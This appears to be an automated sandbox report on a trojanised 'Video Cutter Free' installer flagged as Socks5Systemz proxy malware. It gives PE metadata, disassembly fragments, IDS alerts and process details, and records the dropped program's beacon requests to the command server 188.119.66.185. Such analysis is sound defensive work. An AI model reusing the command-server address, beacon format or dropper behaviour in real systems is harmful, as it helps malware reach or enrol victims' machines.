                                                                            SHA1:0ae7c04b0cbcc96bf8388062135bc0484981c3c2
                                                                            SHA256:798418d2b435a7feab725f614e2b77b3e311c9b859dec456edccc42af6982426
                                                                            SHA512:a991103cf684343e1a032ce78532799f3301c72703d1aedb7ea67aa537d7c93f96a8a7f0be6f62ac7f349b43d2e7a3e1e8a4a25249ad703daf9acb55609c625b
                                                                            SSDEEP:98304:Igwzv2TAvqFWW3d7nN40u+hycoSjH2G6jdYHCXN0/W22:pJ6qIW3d7nnuOnejlW/WP
                                                                            TLSH:B3063321C6C548BEFA2A48B76E14815F1F9B7C1619B8A6223CC584DD0F6BBDD993DF00
                                                                            Icon Hash:2d2e3797b32b2b99
                                                                            Entrypoint:0x409c40
                                                                            Entrypoint Section:CODE
                                                                            Digitally signed:false
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                            DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                            Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major:1
                                                                            OS Version Minor:0
                                                                            File Version Major:1
                                                                            File Version Minor:0
                                                                            Subsystem Version Major:1
                                                                            Subsystem Version Minor:0
                                                                            Import Hash:884310b1928934402ea6fec1dbd3cf5e
                                                                            Instruction
                                                                            push ebp
                                                                            mov ebp, esp
                                                                            add esp, FFFFFFC4h
                                                                            push ebx
                                                                            push esi
                                                                            push edi
                                                                            xor eax, eax
                                                                            mov dword ptr [ebp-10h], eax
                                                                            mov dword ptr [ebp-24h], eax
                                                                            call 00007FB5907F786Bh
                                                                            call 00007FB5907F8A72h
                                                                            call 00007FB5907F8D01h
                                                                            call 00007FB5907F8DA4h
                                                                            call 00007FB5907FAD43h
                                                                            call 00007FB5907FD6AEh
                                                                            call 00007FB5907FD815h
                                                                            xor eax, eax
                                                                            push ebp
                                                                            push 0040A2FCh
                                                                            push dword ptr fs:[eax]
                                                                            mov dword ptr fs:[eax], esp
                                                                            xor edx, edx
                                                                            push ebp
                                                                            push 0040A2C5h
                                                                            push dword ptr fs:[edx]
                                                                            mov dword ptr fs:[edx], esp
                                                                            mov eax, dword ptr [0040C014h]
                                                                            call 00007FB5907FE27Bh
                                                                            call 00007FB5907FDEAEh
                                                                            lea edx, dword ptr [ebp-10h]
                                                                            xor eax, eax
                                                                            call 00007FB5907FB368h
                                                                            mov edx, dword ptr [ebp-10h]
                                                                            mov eax, 0040CE24h
                                                                            call 00007FB5907F7917h
                                                                            push 00000002h
                                                                            push 00000000h
                                                                            push 00000001h
                                                                            mov ecx, dword ptr [0040CE24h]
                                                                            mov dl, 01h
                                                                            mov eax, 0040738Ch
                                                                            call 00007FB5907FBBF7h
                                                                            mov dword ptr [0040CE28h], eax
                                                                            xor edx, edx
                                                                            push ebp
                                                                            push 0040A27Dh
                                                                            push dword ptr fs:[edx]
                                                                            mov dword ptr fs:[edx], esp
                                                                            call 00007FB5907FE2EBh
                                                                            mov dword ptr [0040CE30h], eax
                                                                            mov eax, dword ptr [0040CE30h]
                                                                            cmp dword ptr [eax+0Ch], 01h
                                                                            jne 00007FB5907FE42Ah
                                                                            mov eax, dword ptr [0040CE30h]
                                                                            mov edx, 00000028h
                                                                            call 00007FB5907FBFF8h
                                                                            mov edx, dword ptr [00000030h]
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xd000           0x950         .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x11000          0x2c00        .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0xf000           0x18          .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x0              0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type  Entropy             Characteristics
CODE    0x1000           0x9364        0x9400    e8a38c5eb0d717d3fb478c7e19f20477  False     0.6147856841216216  data       6.563139352016593   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
DATA    0xb000           0x24c         0x400     5d98c64569668b0235ae89005918165a  False     0.3046875           data       2.7373065622921344  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
BSS     0xc000           0xe88         0x0       d41d8cd98f00b204e9800998ecf8427e  False     0                   empty      0.0                 IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata  0xd000           0x950         0xa00     bb5485bf968b970e5ea81292af2acdba  False     0.414453125         data       4.430733069799036   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls    0xe000           0x8           0x0       d41d8cd98f00b204e9800998ecf8427e  False     0                   empty      0.0                 IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata  0xf000           0x18          0x200     9ba824905bf9c7922b6fc87a38b74366  False     0.052734375         data       0.2044881574398449  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc  0x10000          0x8b4         0x0       d41d8cd98f00b204e9800998ecf8427e  False     0                   empty      0.0                 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc   0x11000          0x2c00        0x2c00    567c0aa1f542d9702a3edd7a1af9a832  False     0.326171875         data       4.498451729910216   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
Name           RVA      Size   Type                                                             Language  Country        ZLIB Complexity
RT_ICON        0x11354  0x128  Device independent bitmap graphic, 16 x 32 x 4, image size 192   Dutch     Netherlands    0.5675675675675675
RT_ICON        0x1147c  0x568  Device independent bitmap graphic, 16 x 32 x 8, image size 320   Dutch     Netherlands    0.4486994219653179
RT_ICON        0x119e4  0x2e8  Device independent bitmap graphic, 32 x 64 x 4, image size 640   Dutch     Netherlands    0.4637096774193548
RT_ICON        0x11ccc  0x8a8  Device independent bitmap graphic, 32 x 64 x 8, image size 1152  Dutch     Netherlands    0.3935018050541516
RT_STRING      0x12574  0x2f2  data                                                                                      0.35543766578249336
RT_STRING      0x12868  0x30c  data                                                                                      0.3871794871794872
RT_STRING      0x12b74  0x2ce  data                                                                                      0.42618384401114207
RT_STRING      0x12e44  0x68   data                                                                                      0.75
RT_STRING      0x12eac  0xb4   data                                                                                      0.6277777777777778
RT_STRING      0x12f60  0xae   data                                                                                      0.5344827586206896
RT_RCDATA      0x13010  0x2c   data                                                                                      1.2045454545454546
RT_GROUP_ICON  0x1303c  0x3e   data                                                             English   United States  0.8387096774193549
RT_VERSION     0x1307c  0x4b8  COM executable for DOS                                           English   United States  0.27483443708609273
RT_MANIFEST    0x13534  0x5a4  XML 1.0 document, ASCII text, with CRLF line terminators         English   United States  0.42590027700831024
DLL           Import
kernel32.dll  DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, WideCharToMultiByte, TlsSetValue, TlsGetValue, MultiByteToWideChar, GetModuleHandleA, GetLastError, GetCommandLineA, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, ExitProcess, CreateFileA, CloseHandle
user32.dll    MessageBoxA
oleaut32.dll  VariantChangeTypeEx, VariantCopyInd, VariantClear, SysStringLen, SysAllocStringLen
advapi32.dll  RegQueryValueExA, RegOpenKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA
kernel32.dll  WriteFile, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, Sleep, SizeofResource, SetLastError, SetFilePointer, SetErrorMode, SetEndOfFile, RemoveDirectoryA, ReadFile, LockResource, LoadResource, LoadLibraryA, IsDBCSLeadByte, GetWindowsDirectoryA, GetVersionExA, GetUserDefaultLangID, GetSystemInfo, GetSystemDefaultLCID, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeProcess, GetEnvironmentVariableA, GetCurrentProcess, GetCommandLineA, GetACP, InterlockedExchange, FormatMessageA, FindResourceA, DeleteFileA, CreateProcessA, CreateFileA, CreateDirectoryA, CloseHandle
user32.dll    TranslateMessage, SetWindowLongA, PeekMessageA, MsgWaitForMultipleObjects, MessageBoxA, LoadStringA, ExitWindowsEx, DispatchMessageA, DestroyWindow, CreateWindowExA, CallWindowProcA, CharPrevA
comctl32.dll  InitCommonControls
advapi32.dll  AdjustTokenPrivileges
Language of compilation system | Country where language is spoken | Map
Dutch | Netherlands |
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-10T14:36:27.223217+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 49933 | 188.119.66.185 | 443 | TCP
2024-12-10T14:36:27.910797+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49933 | 188.119.66.185 | 443 | TCP
2024-12-10T14:36:32.934097+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 49945 | 188.119.66.185 | 443 | TCP
2024-12-10T14:36:33.620187+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49945 | 188.119.66.185 | 443 | TCP
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49933 | 188.119.66.185 | 443 | 6460 | C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-10 13:36:27 UTC | 283 | OUT | GET /ai/?key=8f3f2b3ae115416b731ce2a8231e72eee7c4db7e40b82a8dcd6c946851e300888b3250aa15d005633775b0e650f2ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021ddd3b271ed4328f HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 188.119.66.185
2024-12-10 13:36:27 UTC | 200 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 10 Dec 2024 13:36:27 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/7.4.33
2024-12-10 13:36:27 UTC | 810 | IN | Data Ascii: 31e8b723c68ee18403c660fbfe0384c27b6bc8f80224cbd3bc190249f7e16fe04dde7674bb35c8d1e3f787aa0af0d9bf501d299b1ca2974d5f64cc496fc52d6db9c5fadb6f4c10302c3d41b1fdd313a1bd23292d5d0915749c97034f2d4034b6d166cccf71168bbf756a4efeb52aa7fc2cf3ff2f5d8ea4d0e8d5b9234ac34


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49945 | 188.119.66.185 | 443 | 6460 | C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-10 13:36:32 UTC | 291 | OUT | GET /ai/?key=8f3f2b3ae115416b731ce2a8231e72eee7c4db7e40b92a8dcd6c946a4fbd41879e7c4ce71bc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad0388fd3d5965e HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 188.119.66.185
2024-12-10 13:36:33 UTC | 200 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 10 Dec 2024 13:36:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/7.4.33
2024-12-10 13:36:33 UTC | 24 | IN | Data Ascii: e8b723663ec13250



Target ID: 0
Start time: 08:34:20
Start date: 10/12/2024
Path: C:\Users\user\Desktop\imMQqf6YWk.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\imMQqf6YWk.exe"
Imagebase: 0x400000
File size: 3'915'755 bytes
MD5 hash: C9019CFC066B4CF4439AB3FA00AE3AC9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: false

Target ID: 1
Start time: 08:34:20
Start date: 10/12/2024
Path: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp" /SL5="$2042A,3667024,54272,C:\Users\user\Desktop\imMQqf6YWk.exe"
Imagebase: 0x400000
File size: 705'536 bytes
MD5 hash: A0EB775B14D55062C7EB9F9226916FE8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000001.00000002.3874521806.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 3%, ReversingLabs
Reputation: low
Has exited: false

Target ID: 3
Start time: 08:34:21
Start date: 10/12/2024
Path: C:\Windows\SysWOW64\net.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\system32\net.exe" pause video_cutter_free_12102
Imagebase: 0x1a0000
File size: 47'104 bytes
MD5 hash: 31890A7DE89936F922D44D677F681A7F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 4
Start time: 08:34:21
Start date: 10/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6d64d0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 5
Start time: 08:34:22
Start date: 10/12/2024
Path: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe" -i
Imagebase: 0x400000
File size: 4'005'103 bytes
MD5 hash: F00EE01B4436F8DD28084F015B123ECC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000005.00000000.2025991381.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Author: Joe Security
• Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000005.00000002.3874746180.0000000002DA1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe, Author: Joe Security
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
Reputation: low
Has exited: false

Target ID: 6
Start time: 08:34:22
Start date: 10/12/2024
Path: C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\net1 pause video_cutter_free_12102
Imagebase: 0x490000
File size: 139'776 bytes
MD5 hash: 2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true


                                                                              Execution Graph

Execution Coverage: 21.2%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 2.5%
Total number of Nodes: 1463
Total number of Limit Nodes: 16
5377 407443 5378 403198 4 API calls 5377->5378 5379 407460 5378->5379 5379->5095 5387 4051a8 5380->5387 5384 405897 5383->5384 5385 4031e8 18 API calls 5384->5385 5386 4058af 5385->5386 5386->5377 5388 4051c5 5387->5388 5395 404e58 5388->5395 5390 4051f1 5393 403278 18 API calls 5390->5393 5394 4051a3 5393->5394 5394->5373 5398 404e73 5395->5398 5396 404e85 5396->5390 5400 404be4 5396->5400 5398->5396 5403 404f7a 5398->5403 5410 404e4c 5398->5410 5401 405940 19 API calls 5400->5401 5402 404bf5 5401->5402 5402->5390 5404 404f8b 5403->5404 5406 404fd9 5403->5406 5404->5406 5407 40505f 5404->5407 5409 404ff7 5406->5409 5413 404df4 5406->5413 5407->5409 5417 404e38 5407->5417 5409->5398 5411 403198 4 API calls 5410->5411 5412 404e56 5411->5412 5412->5398 5414 404e02 5413->5414 5420 404bfc 5414->5420 5416 404e30 5416->5406 5433 4039a4 5417->5433 5423 4059b0 5420->5423 5422 404c15 5422->5416 5425 4059be 5423->5425 5424 404cdc 19 API calls 5426 4059e8 5424->5426 5425->5424 5427 405194 33 API calls 5426->5427 5428 4059f6 5427->5428 5429 4031e8 18 API calls 5428->5429 5430 405a01 5429->5430 5431 4031b8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5430->5431 5432 405a1b 5431->5432 5432->5422 5434 4039ab 5433->5434 5439 4038b4 5434->5439 5436 4039cb 5437 403198 4 API calls 5436->5437 5438 4039d2 5437->5438 5438->5409 5440 4038d5 5439->5440 5441 4038c8 5439->5441 5443 403934 5440->5443 5444 4038db 5440->5444 5442 403780 6 API calls 5441->5442 5447 4038d0 5442->5447 5445 403993 5443->5445 5446 40393b 5443->5446 5448 4038e1 5444->5448 5449 4038ee 5444->5449 5454 4037f4 VariantClear VariantChangeTypeEx VariantChangeTypeEx 5445->5454 5450 403941 5446->5450 5451 40394b 5446->5451 5447->5436 5452 403894 6 API calls 5448->5452 5453 403894 6 API calls 5449->5453 5455 403864 23 API calls 5450->5455 5456 4037f4 VariantClear VariantChangeTypeEx VariantChangeTypeEx 5451->5456 5452->5447 5457 4038fc 5453->5457 5454->5447 5455->5447 5458 40395d 5456->5458 5459 4037f4 VariantClear 
VariantChangeTypeEx VariantChangeTypeEx 5457->5459 5460 403864 23 API calls 5458->5460 5462 403917 5459->5462 5461 403976 5460->5461 5464 40374c VariantClear 5461->5464 5463 40374c VariantClear 5462->5463 5465 40392c 5463->5465 5466 40398b 5464->5466 5465->5436 5466->5436 5468 4034fd 5467->5468 5475 40352d 5467->5475 5470 403526 5468->5470 5472 403509 5468->5472 5469 403198 4 API calls 5471 403517 5469->5471 5473 403254 18 API calls 5470->5473 5471->5133 5482 4025c4 5472->5482 5473->5475 5475->5469 5477 407cd3 5476->5477 5481 407cc8 5476->5481 5486 407c5c 5477->5486 5480 405890 18 API calls 5480->5481 5481->5129 5483 4025ca 5482->5483 5484 4025dc 5483->5484 5485 403154 4 API calls 5483->5485 5484->5471 5484->5484 5485->5484 5487 407caf 5486->5487 5488 407c70 5486->5488 5487->5480 5487->5481 5488->5487 5490 407bac 5488->5490 5491 407bb7 5490->5491 5492 407bc8 5490->5492 5494 405890 18 API calls 5491->5494 5493 4074a0 34 API calls 5492->5493 5495 407bdc 5493->5495 5494->5492 5496 4074a0 34 API calls 5495->5496 5497 407bfd 5496->5497 5498 407918 InterlockedExchange 5497->5498 5499 407c12 5498->5499 5500 407c28 5499->5500 5501 405890 18 API calls 5499->5501 5500->5488 5501->5500 5503 4078d6 5502->5503 5504 4078e7 5502->5504 5505 4078db InterlockedExchange 5503->5505 5504->5015 5505->5504 6096 409e47 6097 409e6c 6096->6097 6098 4098f4 29 API calls 6097->6098 6102 409e71 6098->6102 6099 409ec4 6130 4026c4 GetSystemTime 6099->6130 6101 409ec9 6103 409330 46 API calls 6101->6103 6102->6099 6105 408dd8 18 API calls 6102->6105 6104 409ed1 6103->6104 6106 4031e8 18 API calls 6104->6106 6107 409ea0 6105->6107 6108 409ede 6106->6108 6110 409ea8 MessageBoxA 6107->6110 6109 406928 19 API calls 6108->6109 6111 409eeb 6109->6111 6110->6099 6112 409eb5 6110->6112 6114 4066c0 19 API calls 6111->6114 6113 405864 19 API calls 6112->6113 6113->6099 6115 409efb 6114->6115 6116 406638 19 API calls 6115->6116 6117 409f0c 6116->6117 6118 403340 18 API calls 6117->6118 6119 409f1a 6118->6119 
6120 4031e8 18 API calls 6119->6120 6121 409f2a 6120->6121 6122 4074e0 37 API calls 6121->6122 6123 409f69 6122->6123 6124 402594 18 API calls 6123->6124 6125 409f89 6124->6125 6126 407a28 19 API calls 6125->6126 6127 409fcb 6126->6127 6128 407cb8 35 API calls 6127->6128 6129 409ff2 6128->6129 6130->6101 6057 407548 6058 407554 CloseHandle 6057->6058 6059 40755d 6057->6059 6058->6059 6601 402b48 RaiseException 6060 407749 6061 4076dc WriteFile 6060->6061 6067 407724 6060->6067 6062 4076e8 6061->6062 6063 4076ef 6061->6063 6065 40748c 35 API calls 6062->6065 6064 407700 6063->6064 6066 4073ec 34 API calls 6063->6066 6065->6063 6066->6064 6067->6060 6069 4077e0 6067->6069 6068 4078db InterlockedExchange 6070 4078e7 6068->6070 6069->6068 6071 407890 6069->6071 6602 40294a 6603 402952 6602->6603 6604 403554 4 API calls 6603->6604 6605 402967 6603->6605 6604->6603 6606 403f4a 6607 403f53 6606->6607 6608 403f5c 6606->6608 6610 403f07 6607->6610 6613 403f09 6610->6613 6611 403f3c 6611->6608 6614 403154 4 API calls 6613->6614 6616 403e9c 6613->6616 6619 403f3d 6613->6619 6633 403e9c 6613->6633 6614->6613 6615 403ef2 6618 402674 4 API calls 6615->6618 6616->6611 6616->6615 6622 403ea9 6616->6622 6624 403e8e 6616->6624 6621 403ecf 6618->6621 6619->6608 6621->6608 6622->6621 6623 402674 4 API calls 6622->6623 6623->6621 6625 403e4c 6624->6625 6626 403e62 6625->6626 6627 403e7b 6625->6627 6629 403e67 6625->6629 6628 403cc8 4 API calls 6626->6628 6630 402674 4 API calls 6627->6630 6628->6629 6631 403e78 6629->6631 6632 402674 4 API calls 6629->6632 6630->6631 6631->6615 6631->6622 6632->6631 6634 403ed7 6633->6634 6640 403ea9 6633->6640 6635 403ef2 6634->6635 6637 403e8e 4 API calls 6634->6637 6638 402674 4 API calls 6635->6638 6636 403ecf 6636->6613 6639 403ee6 6637->6639 6638->6636 6639->6635 6639->6640 6640->6636 6641 402674 4 API calls 6640->6641 6641->6636 6131 403a52 6132 403a74 6131->6132 6133 403a5a WriteFile 6131->6133 6133->6132 6134 403a78 GetLastError 6133->6134 
6134->6132 6135 402654 6136 403154 4 API calls 6135->6136 6138 402614 6136->6138 6137 402632 6137->6137 6138->6137 6139 403154 4 API calls 6138->6139 6139->6137 6650 405160 6651 405173 6650->6651 6652 404e58 33 API calls 6651->6652 6653 405187 6652->6653 5506 409e62 5507 409aa0 18 API calls 5506->5507 5508 409e67 5507->5508 5509 409e6c 5508->5509 5609 402f24 5508->5609 5543 4098f4 5509->5543 5512 409ec4 5548 4026c4 GetSystemTime 5512->5548 5514 409ec9 5549 409330 5514->5549 5515 409e71 5515->5512 5614 408dd8 5515->5614 5519 4031e8 18 API calls 5520 409ede 5519->5520 5567 406928 5520->5567 5521 409ea0 5523 409ea8 MessageBoxA 5521->5523 5523->5512 5525 409eb5 5523->5525 5617 405864 5525->5617 5530 409f0c 5594 403340 5530->5594 5532 409f1a 5533 4031e8 18 API calls 5532->5533 5534 409f2a 5533->5534 5535 4074e0 37 API calls 5534->5535 5536 409f69 5535->5536 5537 402594 18 API calls 5536->5537 5538 409f89 5537->5538 5539 407a28 19 API calls 5538->5539 5540 409fcb 5539->5540 5541 407cb8 35 API calls 5540->5541 5542 409ff2 5541->5542 5621 40953c 5543->5621 5548->5514 5563 409350 5549->5563 5552 409375 CreateDirectoryA 5553 4093ed 5552->5553 5554 40937f GetLastError 5552->5554 5555 40322c 4 API calls 5553->5555 5554->5563 5556 4093f7 5555->5556 5559 4031b8 4 API calls 5556->5559 5557 408dd8 18 API calls 5557->5563 5560 409411 5559->5560 5562 4031b8 4 API calls 5560->5562 5561 407284 19 API calls 5561->5563 5564 40941e 5562->5564 5563->5552 5563->5557 5563->5561 5566 405890 18 API calls 5563->5566 5713 406cf4 5563->5713 5736 409224 5563->5736 5755 404c94 5563->5755 5758 408da8 5563->5758 5564->5519 5566->5563 5868 406820 5567->5868 5570 403454 18 API calls 5571 40694a 5570->5571 5572 4066c0 5571->5572 5873 4068e4 5572->5873 5575 4066f0 5577 403340 18 API calls 5575->5577 5576 4066fe 5578 403454 18 API calls 5576->5578 5581 4066fc 5577->5581 5579 406711 5578->5579 5580 403340 18 API calls 5579->5580 5580->5581 5582 403198 4 API calls 5581->5582 5583 406733 5582->5583 5584 
406638 5583->5584 5585 406642 5584->5585 5586 406665 5584->5586 5879 406950 5585->5879 5587 40322c 4 API calls 5586->5587 5589 40666e 5587->5589 5589->5530 5590 406649 5590->5586 5591 406654 5590->5591 5592 403340 18 API calls 5591->5592 5593 406662 5592->5593 5593->5530 5595 403344 5594->5595 5596 4033a5 5594->5596 5597 40334c 5595->5597 5598 4031e8 5595->5598 5597->5596 5600 4031e8 18 API calls 5597->5600 5603 40335b 5597->5603 5601 403254 18 API calls 5598->5601 5604 4031fc 5598->5604 5599 403228 5599->5532 5600->5603 5601->5604 5602 403254 18 API calls 5606 403375 5602->5606 5603->5602 5604->5599 5605 4025ac 4 API calls 5604->5605 5605->5599 5607 4031e8 18 API calls 5606->5607 5608 4033a1 5607->5608 5608->5532 5610 403154 4 API calls 5609->5610 5611 402f29 5610->5611 5885 402bcc 5611->5885 5613 402f51 5613->5613 5615 408da8 18 API calls 5614->5615 5616 408df4 5615->5616 5616->5521 5618 405869 5617->5618 5619 405940 19 API calls 5618->5619 5620 40587b 5619->5620 5620->5620 5628 40955b 5621->5628 5622 409590 5624 40959d GetUserDefaultLangID 5622->5624 5629 409592 5622->5629 5623 409594 5639 407024 GetModuleHandleA GetProcAddress 5623->5639 5624->5629 5627 40956f 5633 409884 5627->5633 5628->5622 5628->5623 5628->5627 5629->5627 5630 4095cb GetACP 5629->5630 5631 4095ef 5629->5631 5630->5627 5630->5629 5631->5627 5632 409615 GetACP 5631->5632 5632->5627 5632->5631 5634 40988c 5633->5634 5638 4098c6 5633->5638 5635 403420 18 API calls 5634->5635 5634->5638 5636 4098c0 5635->5636 5697 408e80 5636->5697 5638->5515 5640 407067 5639->5640 5641 40705e 5639->5641 5642 407070 5640->5642 5643 4070a8 5640->5643 5650 403198 4 API calls 5641->5650 5660 406f68 5642->5660 5645 406f68 RegOpenKeyExA 5643->5645 5648 4070c1 5645->5648 5646 407089 5647 4070de 5646->5647 5663 406f5c 5646->5663 5652 40322c 4 API calls 5647->5652 5648->5647 5651 406f5c 20 API calls 5648->5651 5654 407120 5650->5654 5655 4070d5 RegCloseKey 5651->5655 5656 4070eb 5652->5656 5657 403198 4 API calls 
5654->5657 5655->5647 5666 4032fc 5656->5666 5659 407128 5657->5659 5659->5629 5661 406f73 5660->5661 5662 406f79 RegOpenKeyExA 5660->5662 5661->5662 5662->5646 5680 406e10 5663->5680 5667 403300 5666->5667 5668 40333f 5666->5668 5669 40330a 5667->5669 5672 4031e8 5667->5672 5668->5641 5670 403334 5669->5670 5671 40331d 5669->5671 5674 4034f0 18 API calls 5670->5674 5673 4034f0 18 API calls 5671->5673 5676 403254 18 API calls 5672->5676 5677 4031fc 5672->5677 5679 403322 5673->5679 5674->5679 5675 403228 5675->5641 5676->5677 5677->5675 5678 4025ac 4 API calls 5677->5678 5678->5675 5679->5641 5681 406e36 RegQueryValueExA 5680->5681 5682 406e7b 5681->5682 5685 406e59 5681->5685 5684 403198 4 API calls 5682->5684 5683 406e73 5686 403198 4 API calls 5683->5686 5687 406f47 RegCloseKey 5684->5687 5685->5682 5685->5683 5688 403278 18 API calls 5685->5688 5689 403420 18 API calls 5685->5689 5686->5682 5687->5647 5688->5685 5690 406eb0 RegQueryValueExA 5689->5690 5690->5681 5691 406ecc 5690->5691 5691->5682 5692 4034f0 18 API calls 5691->5692 5693 406f0e 5692->5693 5694 406f20 5693->5694 5696 403420 18 API calls 5693->5696 5695 4031e8 18 API calls 5694->5695 5695->5682 5696->5694 5698 408e8e 5697->5698 5700 408ea6 5698->5700 5710 408e18 5698->5710 5701 408e18 18 API calls 5700->5701 5702 408eca 5700->5702 5701->5702 5703 407918 InterlockedExchange 5702->5703 5704 408ee5 5703->5704 5705 408e18 18 API calls 5704->5705 5707 408ef8 5704->5707 5705->5707 